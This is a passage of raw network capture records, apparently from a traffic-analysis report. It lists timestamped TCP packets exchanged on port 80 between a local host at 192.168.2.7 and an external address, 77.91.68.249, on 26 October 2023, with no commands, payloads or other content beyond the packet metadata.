                                                                              Oct 26, 2023 09:47:49.597742081 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.597779989 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.597831011 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.597867966 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.597872019 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.597914934 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.597971916 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598294020 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598330975 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.598331928 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598371029 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.598416090 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598453045 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.598472118 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598509073 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598510981 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.598546028 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598546982 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.598582029 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.598630905 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598675013 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598684072 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.598715067 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.598800898 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598838091 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.598839998 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.598872900 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.599370956 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.599431992 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.599437952 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.599481106 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.599482059 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.599519014 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.599524021 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.599556923 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.599556923 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.599595070 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.599596024 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.599634886 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.599636078 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.599674940 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.599776030 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.599814892 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.599864006 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.599900007 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.599945068 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.599982977 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600028992 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600066900 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600111961 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600151062 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600327015 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600363016 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600368023 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600399017 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600400925 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600435972 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600481987 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600519896 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600641966 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600678921 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600681067 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600718021 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600718021 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600754976 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600843906 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600888014 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.600913048 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.600950956 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601037979 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601073980 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601075888 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601113081 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601156950 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601320028 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601356030 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601397991 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601433992 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601435900 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601470947 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601469994 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601514101 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601562977 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601599932 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601599932 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601638079 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601639032 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601675034 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601676941 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601711988 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601757050 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.601794004 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.601881981 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602087975 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602124929 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602169991 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602207899 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602211952 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602251053 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602360964 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602396011 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602402925 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602441072 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602516890 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602551937 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602552891 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602592945 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602634907 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602672100 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602715015 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602750063 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602793932 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602829933 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602830887 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602866888 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.602911949 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.602953911 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.603037119 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603071928 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.603072882 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603107929 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.603199005 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603235006 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.603277922 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603313923 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.603315115 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603352070 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.603399038 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603447914 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.603532076 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603569031 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.603569031 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603617907 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603617907 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.603655100 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603656054 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.603738070 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.603776932 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.604165077 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.604258060 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.604299068 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.604331017 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.604367971 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.604417086 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.604453087 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.604454041 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.604491949 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.604535103 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.604569912 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.604572058 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.604610920 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.604825020 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.604863882 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.604865074 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.604902029 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.604945898 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.604980946 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.604980946 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605016947 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605016947 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605056047 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605057001 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605102062 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605138063 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605175972 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605176926 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605212927 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605214119 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605249882 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605294943 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605329990 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605376005 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605413914 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605593920 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605629921 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605688095 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605726004 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605768919 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605854988 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605855942 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605894089 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.605936050 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.605971098 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606055975 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606093884 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606178999 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606215000 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606265068 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606301069 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606301069 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606339931 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606384039 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606420040 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606420994 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606456995 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606477976 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606515884 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606559038 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606597900 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606681108 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606719971 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606760979 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606797934 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606883049 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.606919050 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.606919050 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607000113 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607037067 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.607151985 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607192993 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.607194901 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607232094 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.607232094 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607270002 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.607355118 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607389927 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607426882 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.607644081 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607681990 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607717991 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607721090 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.607758045 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607759953 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.607815027 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.607841969 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607881069 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.607881069 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.607917070 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.607963085 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608000994 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608000994 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608037949 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608038902 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608073950 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608074903 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608112097 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608202934 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608238935 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608242035 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608275890 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608278036 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608315945 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608655930 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608692884 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608724117 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608760118 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608762026 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608794928 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608795881 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608824015 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608849049 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608880043 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608901978 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608935118 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.608958006 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.608989954 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.609009027 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.609039068 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.609061956 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.609092951 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.609093904 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.609124899 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.609160900 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.609195948 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.609203100 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.609234095 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.609270096 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.609306097 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.609343052 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.609374046 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.609395981 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.609428883 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.609450102 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.609483957 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.609519958 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.609553099 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.760483980 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.760512114 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.760571957 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.760610104 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.760741949 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.760806084 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.760809898 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.760850906 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.760890961 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.761241913 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.761285067 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.761307955 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.761346102 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.761394024 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.761432886 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.761593103 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.761666059 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.761703968 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.761707067 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.761790991 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.761827946 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.762012959 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.762051105 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.762135029 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.762171030 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.762193918 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.762234926 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.762339115 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.762379885 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.792403936 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.792577982 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.792582035 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.792601109 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.792615891 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.792620897 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.792639017 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.792664051 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.793282986 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.793320894 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.793366909 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.793401003 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.793456078 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.793488026 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.793706894 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.793747902 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.794372082 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.794410944 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.794415951 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.794449091 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.794467926 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.794498920 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.794528961 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.794562101 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.795027018 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.795059919 CEST4975380192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:49.795154095 CEST804975377.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:49.795188904 CEST4975380192.168.2.777.91.68.249
